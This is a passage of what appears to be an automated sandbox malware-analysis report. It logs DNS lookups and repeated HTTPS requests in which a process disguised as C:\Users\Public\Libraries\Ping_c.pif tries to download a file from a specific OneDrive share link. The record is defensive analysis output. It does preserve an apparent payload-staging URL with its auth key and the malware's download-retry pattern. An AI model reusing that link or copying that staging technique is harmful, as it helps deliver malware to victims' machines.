                            Sep 21, 2024 16:22:18.557076931 CEST192.168.2.81.1.1.10x7dc0Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                            Sep 21, 2024 16:22:39.434202909 CEST192.168.2.81.1.1.10xdbdStandard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                            Sep 21, 2024 16:22:42.526303053 CEST192.168.2.81.1.1.10x32c5Standard query (0)183.59.114.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                            Sep 21, 2024 16:22:45.347551107 CEST192.168.2.81.1.1.10x6e3fStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                            Sep 21, 2024 16:23:24.352066994 CEST192.168.2.81.1.1.10xd96fStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                            Sep 21, 2024 16:24:01.508694887 CEST192.168.2.81.1.1.10x4a71Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Sep 21, 2024 16:22:18.566612959 CEST1.1.1.1192.168.2.80x7dc0No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                            Sep 21, 2024 16:22:18.566612959 CEST1.1.1.1192.168.2.80x7dc0No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                            Sep 21, 2024 16:22:18.566612959 CEST1.1.1.1192.168.2.80x7dc0No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Sep 21, 2024 16:22:18.566612959 CEST1.1.1.1192.168.2.80x7dc0No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                            Sep 21, 2024 16:22:18.566612959 CEST1.1.1.1192.168.2.80x7dc0No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                            Sep 21, 2024 16:22:39.441749096 CEST1.1.1.1192.168.2.80xdbdName error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                            Sep 21, 2024 16:22:42.706172943 CEST1.1.1.1192.168.2.80x32c5Name error (3)183.59.114.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                            Sep 21, 2024 16:22:45.355413914 CEST1.1.1.1192.168.2.80x6e3fNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                            Sep 21, 2024 16:22:45.355413914 CEST1.1.1.1192.168.2.80x6e3fNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                            Sep 21, 2024 16:22:45.355413914 CEST1.1.1.1192.168.2.80x6e3fNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Sep 21, 2024 16:22:45.355413914 CEST1.1.1.1192.168.2.80x6e3fNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                            Sep 21, 2024 16:22:45.355413914 CEST1.1.1.1192.168.2.80x6e3fNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                            Sep 21, 2024 16:23:24.359759092 CEST1.1.1.1192.168.2.80xd96fNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                            Sep 21, 2024 16:23:24.359759092 CEST1.1.1.1192.168.2.80xd96fNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                            Sep 21, 2024 16:23:24.359759092 CEST1.1.1.1192.168.2.80xd96fNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Sep 21, 2024 16:23:24.359759092 CEST1.1.1.1192.168.2.80xd96fNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                            Sep 21, 2024 16:23:24.359759092 CEST1.1.1.1192.168.2.80xd96fNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                            Sep 21, 2024 16:24:01.516952991 CEST1.1.1.1192.168.2.80x4a71No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                            Sep 21, 2024 16:24:01.516952991 CEST1.1.1.1192.168.2.80x4a71No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                            Sep 21, 2024 16:24:01.516952991 CEST1.1.1.1192.168.2.80x4a71No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Sep 21, 2024 16:24:01.516952991 CEST1.1.1.1192.168.2.80x4a71No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                            Sep 21, 2024 16:24:01.516952991 CEST1.1.1.1192.168.2.80x4a71No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • onedrive.live.com

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.84970813.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:22:19 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:19 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928539&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:3gMxzUja3Ig=:90UExNJOZxytETRjMRLgRRbjAQtHFBa1gINhKJwoDak=:F; domain=.live.com; path=/
                            Set-Cookie: xid=cd8b19c8-82e9-46f1-ad1f-ea7ad0fef045&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:19 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:19 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-jf4m8
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 2FBC2BB15ED04726A761A2B383DA3CBC Ref B: BN3EDGE0721 Ref C: 2024-09-21T14:22:19Z
                            Date: Sat, 21 Sep 2024 14:22:19 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.84971313.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:22:23 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:23 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928543&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:VLCCz0ja3Ig=:sKKnNqSnFKBT+zXFSFXHY6u0ptIS7ruZKeid+kTIXWc=:F; domain=.live.com; path=/
                            Set-Cookie: xid=8aa6156f-920e-44d7-a273-395db3893c4a&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:23 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:23 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-nj9k4
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: BF2BA078D6BB4CE28B4E02C4E8B62CEE Ref B: BN3EDGE0208 Ref C: 2024-09-21T14:22:23Z
                            Date: Sat, 21 Sep 2024 14:22:23 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.84972013.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:22:27 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:27 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928547&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:R07H0Uja3Ig=:cpy/dqNRy4NEElTfm46QVlIFiBGUtZUwMBqIwgYXxsU=:F; domain=.live.com; path=/
                            Set-Cookie: xid=253fe706-c178-4ba5-9f90-2b2ad8d6f501&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:27 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:27 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-874vg
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 60EE4EEC43B249F19DE41CEBEEB4CE57 Ref B: BN3EDGE0217 Ref C: 2024-09-21T14:22:27Z
                            Date: Sat, 21 Sep 2024 14:22:26 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.84972313.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:22:30 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:31 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928551&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:UEDy00ja3Ig=:e/zSLWP1KyCMBo5HU+JVCDoWwNwtS7VbR5faLe8uG6g=:F; domain=.live.com; path=/
                            Set-Cookie: xid=2c13b073-244e-48ce-b7ce-f7bd91aa6e8c&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:30 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:31 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-gq7j8
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 196B57C0F3424B1CBF3EB52260533C82 Ref B: BN3EDGE0712 Ref C: 2024-09-21T14:22:30Z
                            Date: Sat, 21 Sep 2024 14:22:31 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.84972613.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:22:34 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:34 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928554&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:ECf01Uja3Ig=:YWCl9loI149/lkCDKNNLW2wJQOw30kF1Bb2LnVqgP0A=:F; domain=.live.com; path=/
                            Set-Cookie: xid=4e11a88b-b9fd-4afd-90fe-1f69107171dd&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:34 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:34 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-jsmqf
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 093F945EF5724E97A375FF3759C8EE7E Ref B: BN3EDGE0208 Ref C: 2024-09-21T14:22:34Z
                            Date: Sat, 21 Sep 2024 14:22:34 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.84972913.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:22:38 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:38 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928558&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:LduG2Eja3Ig=:UrrrSkYTgzDC81drTE8c1/uSC30Ry6hymVxvS3D0NGs=:F; domain=.live.com; path=/
                            Set-Cookie: xid=93ef7f6b-e040-4a7b-868f-e6e343a33698&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:38 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:38 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-ql9tz
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 4F4A2F226FBB42A2ABD1B6A6AB1E91F3 Ref B: BN3EDGE1019 Ref C: 2024-09-21T14:22:38Z
                            Date: Sat, 21 Sep 2024 14:22:38 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.85351113.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:22:43 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:43 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928563&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:3atH20ja3Ig=:Z5Wuwha+0/qkjMx0VGEd9YqjlTGD/7ejwCxSneSQZ+8=:F; domain=.live.com; path=/
                            Set-Cookie: xid=2450b662-08f5-4aa6-bf08-ed3227f3fb37&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:43 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:43 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-tzmkb
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: C01D664885314B9E9AF92EFD81F3EA19 Ref B: BN3EDGE0821 Ref C: 2024-09-21T14:22:43Z
                            Date: Sat, 21 Sep 2024 14:22:42 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.85351613.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:22:46 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:46 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928566&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:iRcc3Uja3Ig=:f+o7mX4X74DL2iA/djpFkwq9PT15dYlfZH2zykYszaw=:F; domain=.live.com; path=/
                            Set-Cookie: xid=07ff36a1-1cf9-4f00-97eb-4c8d83c2db21&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:46 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:46 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-2g6z6
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 2D6D623D1273470A8FA08EAC64306A45 Ref B: BN3EDGE0603 Ref C: 2024-09-21T14:22:46Z
                            Date: Sat, 21 Sep 2024 14:22:46 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.85352013.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:22:49 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:49 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928569&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:1bEI30ja3Ig=:k+V+Ig4UQHBouhLWgz3GSPPYPaDE9KWUuPiFuwFz+FI=:F; domain=.live.com; path=/
                            Set-Cookie: xid=0042b224-aaae-4cc6-95e2-6997041a4917&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:49 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:49 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-tzmkb
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 57119BA5318A440187BBB3BCBB7766B7 Ref B: BN3EDGE0607 Ref C: 2024-09-21T14:22:49Z
                            Date: Sat, 21 Sep 2024 14:22:49 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.85352313.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:22:52 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:52 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928572&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:jxbM4Eja3Ig=:q8+CxzZuGEGkyT0zW+LzAAoWS48l+rvmT2XCFC5pPfg=:F; domain=.live.com; path=/
                            Set-Cookie: xid=668e6e9d-29c3-4a24-abe3-be5aa03629eb&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:52 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:52 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-gz268
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 404DA3AE75214668BC9E68503CC8C779 Ref B: BN3EDGE0712 Ref C: 2024-09-21T14:22:52Z
                            Date: Sat, 21 Sep 2024 14:22:52 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.85352613.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:22:55 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:56 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928575&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:FG2s4kja3Ig=:ozl/a//ZIsRLvkdon0hqYGoFlpmyYoUJIiWAYV2hJMo=:F; domain=.live.com; path=/
                            Set-Cookie: xid=fa8d0370-abef-4aaa-b913-c4e959cde092&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:55 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:55 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-9m949
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 1A2E72B0EDAC4F0DA30BBB4D3D969DDC Ref B: BN3EDGE1118 Ref C: 2024-09-21T14:22:55Z
                            Date: Sat, 21 Sep 2024 14:22:55 GMT
                            Connection: close
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.85352913.107.137.114437348C:\Users\Public\Libraries\Ping_c.pif
                            TimestampBytes transferredDirectionData
                            2024-09-21 14:22:58 UTC213OUTGET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:59 UTC1149INHTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928579&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:BV+V5Eja3Ig=:kQOxgw9oRNv97eqUcto6AwnBhlxqR9E8/JABHf+U4eY=:F; domain=.live.com; path=/
                            Set-Cookie: xid=a5f73d3b-5d21-470c-92bc-bca3d5ebda15&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:58 GMT; path=/
